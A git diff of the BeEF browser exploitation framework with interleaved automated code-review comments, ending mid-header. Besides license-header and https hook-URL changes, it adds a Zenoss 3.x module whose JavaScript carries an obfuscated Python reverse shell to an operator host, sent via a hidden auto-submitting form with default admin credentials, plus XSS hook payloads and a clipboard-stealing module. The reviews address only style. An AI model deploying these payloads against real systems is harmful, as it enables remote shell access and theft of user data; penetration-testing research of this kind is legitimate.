diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 6a942ff85..7a0e8c0eb 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
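Review bot: `lhost = "#{configuration.get("beef.http.host")}"` in the new wanem_command_execution/module.rb wraps the value in an interpolated string for no effect other than a `to_s`; `lhost = configuration.get("beef.http.host").to_s` says what is meant and keeps the nil-safety, and the following `lhost = "" if lhost == "0.0.0.0"` deserves a one-line comment such as `# a wildcard bind address is not reachable from the target; force the operator to fill it in`. The identical two lines appear in the zenoss_3x_command_execution/module.rb hunk of this commit, so the same tidy-up applies there. The `'value' => '80' }` entry also carries a stray space before `}` that the other three entries do not.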
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var uri = '<%= @uri.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index a43a30312..b69f3adce 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
@@ -22,4 +12,4 @@ beef:
 description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.
For more information see: http://www.exploit-db.com/exploits/20062/"
 authors: ["bcoles", "muts"]
 target:
- working: ["ALL"]
+ unknown: ["ALL"]
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
index abcf44b8c..bbcc39d2f 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -1,24 +1,15 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Alienvault_ossim_3_1_xss < BeEF::Core::Command
 def self.options
 configuration = BeEF::Core::Configuration.instance
- hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+ proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+ hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 return [
 {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url='}
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index 81933f79a..1da723675 100644
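Review bot: The two added lines computing `proto` and `hook_uri` in alienvault_ossim_3.1_xss/module.rb are repeated verbatim in the cisco_collaboration_server_5_xss and serendipity_1.6_xss module.rb hunks of this commit (and the new sqlitemanager_xss one), so the scheme/host/port rule now lives in four places; a small helper on the shared base (say, a `hook_uri` class method on `BeEF::Core::Command`) would keep it in one. `configuration.get("beef.http.https.enable") == true` also treats anything but a literal boolean `true` — including a string "true" if the config reader does not type YAML scalars — as plain http; I cannot tell from this diff how the getter returns the value, so worth confirming or relaxing to a truthiness check. `self.options` continues past the end of the hunk.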
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var uri = '<%= @uri.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
index 3320a74f6..b93a2c26b 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
@@ -22,4 +12,4 @@ beef:
 description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/"
 authors: ["bcoles", "s4squatch"]
 target:
- working: ["ALL"]
+ unknown: ["ALL"]
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
index f0e42f7df..cc8d0732a 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb
@@ -1,24 +1,15 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cisco_collaboration_server_5_xss < BeEF::Core::Command
 def self.options
 configuration = BeEF::Core::Configuration.instance
- hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+ proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+ hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 return [
 {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'}
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index a20ff5bbb..c919b9bb6 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var uri = '<%= @uri.gsub(/'/, "\\'") %>';
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 96d9e9bb2..c386055cc 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
@@ -22,4 +12,4 @@ beef:
 description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/"
 authors: ["bcoles", "Stefan Schurtz"]
 target:
- working: ["ALL"]
+ unknown: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
index cf46a83d1..68356a916 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -1,24 +1,15 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Serendipity_1_6_xss < BeEF::Core::Command
 def self.options
 configuration = BeEF::Core::Configuration.instance
- hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+ proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+ hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 return [
 {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'}
diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js
new file mode 100644
index 000000000..608c4e23e
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/command.js @@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var user = '<%= @user %>'; + var pass = '<%= @pass %>'; + var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig' + + // reverse python payload + var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22') + + // send request + var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [ + {'type':'hidden', 'name':'__ac_name', 'value':user}, + {'type':'hidden', 'name':'__ac_password', 'value':pass}, + {'type':'hidden', 'name':'daemon', 'value':payload} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(zenoss_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", 15000); + +}); + 
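Review bot: `var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'` and the `var payload = unescape(...)` line below it in the new zenoss_3x_command_execution/command.js have no terminating `;`, while every other statement in the file does; automatic semicolon insertion happens to rescue both here only because the next token is a comment or `var`, so add the `;` to each. `unescape` is a legacy Annex B function; as the literal uses only `%XX` ASCII escapes, `decodeURIComponent` is a drop-in replacement. The `// send request` comment sits above a line that only builds the form, and it is the `beef.dom.createIframeXsrfForm` call that submits it — worth rewording to `// build and auto-submit the hidden form` if that is what the helper does, which I cannot confirm from this diff.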
diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml
new file mode 100644
index 000000000..d58269969
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+beef:
+ module:
+ zenoss_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "Zenoss 3.x Command Execution"
+ description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb
new file mode 100644
index 000000000..5511d5b43
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
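Review bot: The module key under `beef.module` is `zenoss_command_execution` while the file lives in `modules/exploits/zenoss_3x_command_execution/` and the class in the accompanying module.rb is `Zenoss_command_execution`; the other new modules in this commit (wanem_command_execution, sqlitemanager_xss) use one name for directory, key and class. If the loader ties the config key to the directory name this module will not be registered, and even if it does not, the mismatch makes the module hard to find from the UI name; I cannot tell from the diff which applies, so either confirm the loader's rule or rename the key to `zenoss_3x_command_execution:` and the class to match. A short `# key must match the module directory name` comment above the key would record whichever rule holds.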
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+class Zenoss_command_execution < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
+ { 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin'},
+ { 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
index 9650a2684..474557d8d 100644
--- a/modules/exploits/zenoss_add_user_csrf/command.js
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 var base = '<%= @base %>';
 var user_level = '<%= @user_level %>';
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index eaf9a25f5..bcb3ea9aa 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -1,25 +1,15 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
 module:
 zenoss_add_user_csrf:
 enable: true
 category: "Exploits"
- name: "Zenoss <= 3.2.1 Add User CSRF"
- description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+ name: "Zenoss 3.x Add User CSRF"
+ description: "Attempts to add a user to a Zenoss Core 3.x server."
 authors: ["bcoles"]
 target:
 working: ["ALL"]
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
index 28fac6d60..717d0cdd8 100644
--- a/modules/exploits/zenoss_add_user_csrf/module.rb
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Zenoss_add_user_csrf < BeEF::Core::Command
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
deleted file mode 100644
index 148f0c6bf..000000000
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ /dev/null
@@ -1,70 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -class Zenoss_daemon_csrf < BeEF::Core::Command - - def self.options - return [ - { 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, - { 'name' => 'service', - 'type' => 'combobox', - 'ui_label' => 'Daemon', - 'store_type' => 'arraystore', - 'store_fields' => ['service', 'description'], - 'store_data' => [ - ['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'], - ['zopectl', 'zopectl (The Zope open source web application server)'], - ['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'], - ['zenjobs', 'zenjobs (Zenjobs)'], - ['zenping', 'zenping (ICMP ping status monitoring)'], - ['zensyslog', 'zensyslog (Collection of and classification of syslog events)'], - ['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'], - ['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'], - ['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'], - ['zenmodeler', 'zenmodeler (Configuration collection and configuration)'], - ['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'], - ['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'], - ['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'], - ['zenwin', 
'zenwin (Windows Service Monitoring (WMI))'], - ['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'], - ['zenjmx', 'zenjmx (ZenJMX)'] - ], - 'emptyText' => 'Select a daemon', - 'valueField' => 'service', - 'displayField' => 'service', #'description', - 'mode' => 'local', - 'autoWidth' => true - }, - { 'name' => 'action', - 'type' => 'combobox', - 'ui_label' => 'Action', - 'store_type' => 'arraystore', - 'store_fields' => ['action'], - 'store_data' => [ - ['Start'],['Stop'],['Restart'] - ], - 'valueField' => 'action', - 'displayField' => 'action', - 'mode' => 'local', - 'autoWidth' => true - } - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - -end diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js index 1c717da87..aab376979 100644 --- a/modules/host/clipboard_theft/command.js +++ b/modules/host/clipboard_theft/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (clipboardData.getData("Text") !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text")); 
diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml index ec30fcb28..00808de40 100644 --- a/modules/host/clipboard_theft/config.yaml +++ b/modules/host/clipboard_theft/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb index 75274ab32..1fb46fe28 100644 --- a/modules/host/clipboard_theft/module.rb +++ b/modules/host/clipboard_theft/module.rb 
@@ -1,17 +1,7 @@
 #
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Clipboard_theft < BeEF::Core::Command
diff --git a/modules/host/detect_bitdefender2012/command.js b/modules/host/detect_bitdefender2012/command.js
new file mode 100644
index 000000000..c276a3098
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ var temp=document.body.innerHTML;
+ var key="netdefender/hui/ndhui.js";
+ if(temp.indexOf(key)>0) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+ } else {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+ };
+
+});
+
diff --git a/modules/host/detect_bitdefender2012/config.yaml b/modules/host/detect_bitdefender2012/config.yaml
new file mode 100644
index 000000000..e2f4e621b
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/config.yaml
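Review bot: The detection in the new command.js keys on `document.body.innerHTML.indexOf(key)>0`, which treats a match at offset 0 as absent and, because it only serialises `<body>`, would miss the Bitdefender script entirely if the product injects its `<script src=".../netdefender/hui/ndhui.js">` into `<head>` (where it lands is not visible in this diff, so confirm against a live install). Walking `document.getElementsByTagName('script')` and comparing each `src` avoids both problems and is cheaper than serialising the whole body on every hook. The `};` closing the else block is a stray empty statement and should be `}`.
```javascript
beef.execute(function() {
  var key = "netdefender/hui/ndhui.js";
  var scripts = document.getElementsByTagName('script');
  var found = false;
  for (var i = 0; i < scripts.length; i++) {
    if (scripts[i].src && scripts[i].src.indexOf(key) !== -1) { found = true; break; }
  }
  if (found) {
  // … unchanged: the two beef.net.send('bitdefender=…') calls …
```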
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + detect_bitdefender2012: + enable: true + category: "Host" + name: "Detect Bit Defender 2012" + description: "This module detect the javascript code automatically included by Bitdefender 2012" + authors: ["nbblrr"] + target: + working: ["ALL"] diff --git a/modules/host/detect_bitdefender2012/module.rb b/modules/host/detect_bitdefender2012/module.rb new file mode 100644 index 000000000..421265c09 --- /dev/null +++ b/modules/host/detect_bitdefender2012/module.rb @@ -0,0 +1,13 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# + +class Detect_bitdefender2012 < BeEF::Core::Command + + def post_execute + save({'BitDefender' => @datastore['bitdefender']}) + end + +end diff --git a/modules/host/detect_cups/command.js 